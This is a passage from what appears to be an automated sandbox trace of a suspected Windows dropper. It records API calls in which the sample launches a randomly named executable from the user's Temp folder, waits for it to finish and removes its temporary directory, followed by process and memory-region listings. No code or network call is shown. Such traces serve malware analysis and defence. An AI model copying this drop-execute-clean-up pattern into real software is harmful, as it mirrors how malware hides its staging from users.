(lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0118.356] lstrcpynW (in: lpString1=0x428228, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0118.356] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0118.356] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jplmbcuny", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jplmbcuny") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jplmbcuny" [0118.356] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jplmbcuny", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x426710*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f3d8 | out: lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jplmbcuny", lpProcessInformation=0x19f3d8*(hProcess=0x228, hThread=0x28, dwProcessId=0xe48, dwThreadId=0x404)) returned 1 [0118.413] CloseHandle (hObject=0x28) returned 1 [0118.413] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0118.545] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0118.546] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0119.273] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0119.273] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0120.324] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0120.324] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0121.742] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0121.742] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0122.288] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0122.288] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0122.434] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0122.434] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0122.550] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0122.550] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0122.660] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0122.660] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0122.773] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0122.773] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0122.889] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0122.889] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0123.024] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0123.024] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0123.153] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0123.153] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0123.262] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0123.262] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0123.384] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0123.384] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0123.531] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0123.531] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0123.760] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0123.760] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0123.966] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0123.966] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0124.338] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0124.338] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0124.659] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0124.659] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0124.792] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0124.792] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0124.906] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0124.906] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0125.032] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0125.032] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0125.172] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0125.172] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x0 [0125.311] GetExitCodeProcess (in: hProcess=0x228, lpExitCode=0x19f3e4 | out: lpExitCode=0x19f3e4*=0x0) returned 1 [0125.311] CloseHandle (hObject=0x228) returned 1 [0125.312] DestroyWindow (hWnd=0x0) returned 0 [0125.312] EndDialog (hDlg=0xd0042, nResult=0x0) returned 1 [0125.335] CloseHandle (hObject=0x210) returned 1 [0125.336] lstrcpynW (in: lpString1=0x425f10, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp" [0125.336] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp") returned 48 [0125.336] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsl9f76.tmp"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x357cee7c, ftCreationTime.dwHighDateTime=0x1d8604e, ftLastAccessTime.dwLowDateTime=0x357cee7c, ftLastAccessTime.dwHighDateTime=0x1d8604e, ftLastWriteTime.dwLowDateTime=0x357cee7c, ftLastWriteTime.dwHighDateTime=0x1d8604e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nsl9F76.tmp", cAlternateFileName="")) returned 0x69e898 [0125.337] FindClose (in: hFindFile=0x69e898 | out: hFindFile=0x69e898) returned 1 [0125.337] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp") returned 48 [0125.337] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0125.337] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3597aad6, ftLastAccessTime.dwHighDateTime=0x1d8604e, ftLastWriteTime.dwLowDateTime=0x3597aad6, ftLastWriteTime.dwHighDateTime=0x1d8604e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x69e3d8 [0125.338] FindClose (in: hFindFile=0x69e3d8 | out: hFindFile=0x69e3d8) returned 1 [0125.338] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0125.338] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local") returned 31 [0125.338] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x69e898 [0125.338] FindClose (in: hFindFile=0x69e898 | out: hFindFile=0x69e898) returned 1 [0125.338] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local") returned 31 [0125.339] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData") returned 25 [0125.339] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x69e798 [0125.339] FindClose (in: hFindFile=0x69e798 | out: hFindFile=0x69e798) returned 1 [0125.339] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData") returned 25 [0125.339] lstrlenW (lpString="C:\\Users\\RDHJ0C~1") returned 17 [0125.339] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x69e458 [0125.339] FindClose (in: hFindFile=0x69e458 | out: hFindFile=0x69e458) returned 1 [0125.339] lstrlenW (lpString="C:\\Users\\RDHJ0C~1") returned 17 [0125.340] lstrlenW (lpString="C:\\Users") returned 8 [0125.340] FindFirstFileW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x69e318 [0125.340] FindClose (in: hFindFile=0x69e318 | out: hFindFile=0x69e318) returned 1 [0125.340] lstrlenW (lpString="C:\\Users") returned 8 [0125.340] lstrlenW (lpString="C:") returned 2 [0125.340] lstrlenW (lpString="C:") returned 2 [0125.340] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0125.341] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0125.341] lstrcpynW (in: lpString1=0x425710, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp" [0125.341] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp\\*.*") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp\\*.*" [0125.341] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp\\" [0125.341] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp\\") returned 49 [0125.341] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsl9f76.tmp\\*.*"), lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x357cee7c, ftCreationTime.dwHighDateTime=0x1d8604e, ftLastAccessTime.dwLowDateTime=0x357cee7c, ftLastAccessTime.dwHighDateTime=0x1d8604e, ftLastWriteTime.dwLowDateTime=0x357cee7c, ftLastWriteTime.dwHighDateTime=0x1d8604e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75656b08, dwReserved1=0x75656e7e, cFileName=".", cAlternateFileName="")) returned 0x69e518 [0125.341] FindNextFileW (in: hFindFile=0x69e518, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x357cee7c, ftCreationTime.dwHighDateTime=0x1d8604e, ftLastAccessTime.dwLowDateTime=0x357cee7c, ftLastAccessTime.dwHighDateTime=0x1d8604e, ftLastWriteTime.dwLowDateTime=0x357cee7c, ftLastWriteTime.dwHighDateTime=0x1d8604e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75656b08, dwReserved1=0x75656e7e, cFileName="..", cAlternateFileName="")) returned 1 [0125.341] FindNextFileW (in: hFindFile=0x69e518, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x357cee7c, ftCreationTime.dwHighDateTime=0x1d8604e, ftLastAccessTime.dwLowDateTime=0x357cee7c, ftLastAccessTime.dwHighDateTime=0x1d8604e, ftLastWriteTime.dwLowDateTime=0x357cee7c, ftLastWriteTime.dwHighDateTime=0x1d8604e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75656b08, dwReserved1=0x75656e7e, cFileName="..", cAlternateFileName="")) returned 0 [0125.341] FindClose (in: hFindFile=0x69e518 | out: hFindFile=0x69e518) returned 1 [0125.341] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsl9f76.tmp"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x357cee7c, ftCreationTime.dwHighDateTime=0x1d8604e, ftLastAccessTime.dwLowDateTime=0x357cee7c, ftLastAccessTime.dwHighDateTime=0x1d8604e, ftLastWriteTime.dwLowDateTime=0x357cee7c, ftLastWriteTime.dwHighDateTime=0x1d8604e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nsl9F76.tmp", cAlternateFileName="")) returned 0x69e8d8 [0125.342] FindClose (in: hFindFile=0x69e8d8 | out: hFindFile=0x69e8d8) returned 1 [0125.342] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp") returned 48 [0125.342] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp\\" [0125.342] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsl9f76.tmp")) returned 0x10 [0125.342] SetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp\\", dwFileAttributes=0x10) returned 1 [0125.343] RemoveDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsl9F76.tmp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsl9f76.tmp")) returned 1 [0125.344] OleUninitialize () [0125.351] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0x13bc Thread: id = 3 os_tid = 0xc04 Thread: id = 4 os_tid = 0x8ac Process: id = "2" image_name = "cbgsujmwws.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\cbgsujmwws.exe" page_root = "0x6dfe6000" os_pid = "0xe48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x13dc" cmd_line = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jplmbcuny" cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 364 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 365 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 366 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 367 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 368 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 369 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 370 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 371 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 372 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 373 start_va = 0x400000 end_va = 0x404fff monitored = 1 entry_point = 0x401000 region_type = mapped_file name = "cbgsujmwws.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\cbgsujmwws.exe") Region: id = 374 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 375 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 376 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 377 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 378 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 379 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 380 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 381 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 382 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 383 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 384 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 385 start_va = 0x490000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 386 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 387 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 388 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 389 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 390 start_va = 0x490000 end_va = 0x54dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 391 start_va = 0x550000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 392 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 393 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 394 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 395 start_va = 0x77680000 end_va = 0x776c4fff monitored = 0 entry_point = 0x7769de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 396 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 397 start_va = 0x410000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 398 start_va = 0x650000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 399 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" 